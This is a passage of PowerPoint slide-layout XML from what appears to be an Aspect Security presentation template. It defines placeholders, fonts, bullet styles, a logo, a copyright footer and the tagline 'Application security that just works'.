              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
